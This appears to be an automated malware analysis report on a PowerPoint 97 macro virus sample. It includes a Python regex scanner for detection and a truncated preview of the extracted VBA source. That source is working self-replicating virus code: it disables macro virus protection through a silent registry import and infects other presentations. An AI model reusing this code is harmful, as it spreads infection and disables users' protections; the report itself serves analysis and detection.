Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
The sample is a PowerPoint 97 (Office 8.0) presentation whose VBA project contains two self-replicating macro modules. The LACOPHRONE module exports its own source to C:\CONFIG.LAC, greys out the Tools > Macro and Tools > Customize... menu items through CommandBars, writes a REGEDIT4 file to c:\power.reg that sets the value MacroVirusProtection under HKCU\Software\Microsoft\Office\8.0\PowerPoint\Options to 0, applies it silently with Shell "regedit /s c:\power.reg", then imports CONFIG.LAC into every open presentation and binds the mouse-over and mouse-click actions of the shapes on the last slide to run the macro. The second module, which names itself PPT.Amy.a in a comment header, exports itself to a .VXD file derived from Application.Path and uses Application.FileSearch to open, infect and save every *.PPT below the current presentation's folder. Note that the registry value written is PowerPoint's macro-warning setting rather than a Run key: that part of the behaviour is defence evasion (turning off macro virus protection), and persistence comes from the infected presentations themselves. The embedded URL http://www.nod32.com.au/ appears only in the document body (OLE text), not in the macro code, and has an unknown reputation. The primary intent is self-propagation and evasion of security controls.
Heuristics (4)
- ClamAV: Win.Trojan.PPT97-1 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Win.Trojan.PPT97-1
- VBA macros detected [medium, OLE_VBA_MACROS, 1 related finding]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://www.nod32.com.au/ (in document text, OLE body)
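As an added example (not part of this report, and not oletools' own code), the following Python scanner runs indicator checks of the kind listed above over decoded VBA source. It resolves VBA With blocks so that a statement such as `.Export (...)` inside `With ActivePresentation.VBProject.VBComponents(...)` is matched as the full call, and it triages the hits into a verdict. The indicator names, severities and the `scan`/`verdict` helpers are assumptions of this example; the sample input is a trimmed, slightly simplified copy of the LACO routine shown in the artifact preview below.

```python
import re


def strip_comment(line):
    """Drop a trailing VBA comment, ignoring apostrophes inside string literals."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line


def resolve_with_blocks(vba_source):
    """Yield (line_no, statement): '_' continuations joined and, inside a With
    block, the With expression prepended to statements that start with '.'."""
    stack, pending = [], ""
    for line_no, raw in enumerate(vba_source.splitlines(), 1):
        code = strip_comment(raw).strip()
        if code.endswith(" _"):          # VBA line continuation
            pending += code[:-1]
            continue
        code, pending = pending + code, ""
        if not code:
            continue
        upper = code.upper()
        if upper.startswith("WITH "):
            stack.append(code[5:].strip())
        elif upper.startswith("END WITH"):
            if stack:
                stack.pop()
            continue
        elif code.startswith(".") and stack:
            code = stack[-1] + code      # e.g. ".Export" -> "X.VBProject.VBComponents(...).Export"
        yield line_no, code


# Indicator name -> (regex over the resolved statement, severity). Names and
# severities are this example's own; they loosely mirror the report's labels.
INDICATORS = {
    "shell_call":            (r'\bShell\s*[("]', "critical"),
    "regedit_silent_import": (r'\bregedit(?:\.exe)?\s+/s\b', "critical"),
    "macro_protection_off":  (r'MacroVirusProtection.*=\s*dword:0+\b', "critical"),
    "reg_file_written":      (r'\bOpen\s+".*\.reg"\s+For\s+Output\b', "high"),
    "vbproject_export":      (r'VBProject\.VBComponents.*\.Export\b', "high"),
    "vbproject_import":      (r'VBProject\.VBComponents.*\.Import\b', "high"),
    "action_run_macro":      (r'ActionSettings\(.*\)\.Action\s*=\s*ppActionRunMacro\b', "high"),
    "filesearch_ppt":        (r'FileSearch\.FileName\s*=\s*"\*\.PPT"', "medium"),
    "menu_tampering":        (r'CommandBars\(.*\)\.Controls\(.*\)\.Enabled\s*=\s*(?:0|False)\b', "medium"),
}
COMPILED = {n: (re.compile(p, re.I), s) for n, (p, s) in INDICATORS.items()}


def scan(vba_source):
    """Return {indicator: [(line_no, resolved_statement), ...]} for every hit."""
    findings = {}
    for line_no, code in resolve_with_blocks(vba_source):
        for name, (rx, _sev) in COMPILED.items():
            if rx.search(code):
                findings.setdefault(name, []).append((line_no, code))
    return findings


def verdict(findings):
    """Crude triage: any critical -> malicious; two or more high -> suspicious."""
    sev = [COMPILED[n][1] for n in findings]
    if "critical" in sev:
        return "malicious"
    if sev.count("high") >= 2:
        return "suspicious"
    return "low" if sev else "clean"


# Constructed sample: a trimmed copy of the LACO routine from the artifact
# preview, embedded here so the scanner runs offline.
SAMPLE_VBA = r'''
Sub LACO()
On Error Resume Next
With ActivePresentation.VBProject.VBComponents("LACOPHRONE")
.Export ("C:\CONFIG.LAC")
End With
With CommandBars("Tools")
.Controls("Macro").Enabled = 0
End With
Open "c:\power.reg" For Output As 1
Print #1, "REGEDIT4"
Print #1, """MacroVirusProtection""=dword:00000000"
Close 1
Shell "regedit /s c:\power.reg", vbHide
With Presentations(i).VBProject.VBComponents
.Import("C:\CONFIG.LAC").Name = "LACOPHRONE"
End With
With kilo.ActionSettings(ppMouseOver)
.Action = ppActionRunMacro
End With
End Sub
'''

if __name__ == "__main__":
    hits = scan(SAMPLE_VBA)
    for name, lines in hits.items():
        print(f"{COMPILED[name][1]:8} {name:22} line {lines[0][0]}: {lines[0][1]}")
    print("verdict:", verdict(hits))
```

The With-block resolution is what makes the export/import indicators reliable on this family: olevba's per-line keyword matching sees only `.Export ("C:\CONFIG.LAC")`, while the resolved statement ties the call to the VBProject, which is the actual self-replication primitive. Regex indicators remain easy to evade (string concatenation, Chr() building, late-bound CreateObject), so treat a clean result from this kind of scanner as "nothing obvious", not as a verdict.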
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4272 bytes |

SHA-256: 8b936a64ab19fde3e62f3d7d306bf588f56b8f37534a9df8378cb818d7c3abb9
Detection: ClamAV: Win.Trojan.PP97M-1
Obfuscation or payload: unlikely
Preview of the extracted script (first 1,000 lines):

```vba
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_Creatable = True
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Module1"
Attribute VB_Name = "LACOPHRONE"
Sub LACO()
On Error Resume Next
With ActivePresentation.VBProject.VBComponents("LACOPHRONE")
.Export ("C:\CONFIG.LAC")
End With
With CommandBars("Tools")
.Controls("Macro").Enabled = 0
.Controls("Customize...").Enabled = 0
End With
Open "c:\power.reg" For Output As 1
Print #1, "REGEDIT4"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\PowerPoint\Options]"
Print #1, """MacroVirusProtection""=dword:00000000"
Close 1
Shell "regedit /s c:\power.reg", vbHide
For i = 1 To Presentations.Count
If Presentations(i).VBProject.VBComponents(1).Name <> "LACOPHRONE" Then
With Presentations(i).VBProject.VBComponents
.Import("C:\CONFIG.LAC").Name = "LACOPHRONE"
End With
End If
Next
For Each kilo In ActivePresentation.Slides(ActivePresentation.Slides.Count).Shapes
With kilo.ActionSettings(ppMouseOver)
.Action = ppActionRunMacro
.Run "LACOPHRONE"
End With
With kilo.ActionSettings(ppMouseClick)
.Action = ppActionRunMacro
.Run "LACOPHRONE"
End With
Next
End Sub
Attribute VB_Name = "Module1"
Const OurAmy = "Amy"
Public SlideAmy As Object
'----------------------------------------------------------------
'PPT.Amy.a
'By -KD- [Metaphase VX Team & NoMercyVirusTeam]
'Greets to Raven, KidCypher, Error-, Foxz, Evul, Roadkil, Tally
'JFK, Slagehammer, AngelsKitten, BSL4, Antistate and #virus
'----------------------------------------------------------------
Sub A\(Amy): On Error Resume Next
If Dir(Application.Path & ".VXD") = "" Then _
ActivePresentation.VBProject.VBComponents(OurAmy).Export Application.Path & ".VXD"
For Each SlideAmy In Presentations
CatchAmy
Next
With Application.FileSearch
.LookIn = ActivePresentation.Path
.FileName = "*.PPT"
.SearchSubFolders = True
.Execute
For MyAmy = 1 To .FoundFiles.Count
If .FoundFiles(MyAmy) = ActivePresentation.FullName Then GoTo CatchThis
Set SlideAmy = Presentations.Open(.FoundFiles(MyAmy))
If SlideAmy.VBProject.VBComponents(OurAmy).Name <> OurAmy Then
Call CatchAmy
SlideAmy.Save
End If
SlideAmy.Close
CatchThis Next
End With
End Sub
Private Sub CatchAmy()
On Error Resume Next
If SlideAmy.VBProject.VBComponents(OurAmy).Name <> OurAmy Then
SlideAmy.VBProject.VBComponents.Import Application.Path & ".VXD"
For Each AmyAction In SlideAmy.Slides(SlideAmy.Slides.Count).Shapes
If AmyAction.ActionSettings(ppMouseOver).Action = 0 Then
AmyAction.ActionSettings(ppMouseOver).Action = ppActionRunMacro
AmyAction.ActionSettings(ppMouseOver).Run = "A\"
If Day(Date) = "1" Or Day(Date) = "25" Then
Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlert
.Text = "Here I am again. again overwhelming feelings. thousand miles away. part of
```

... (truncated)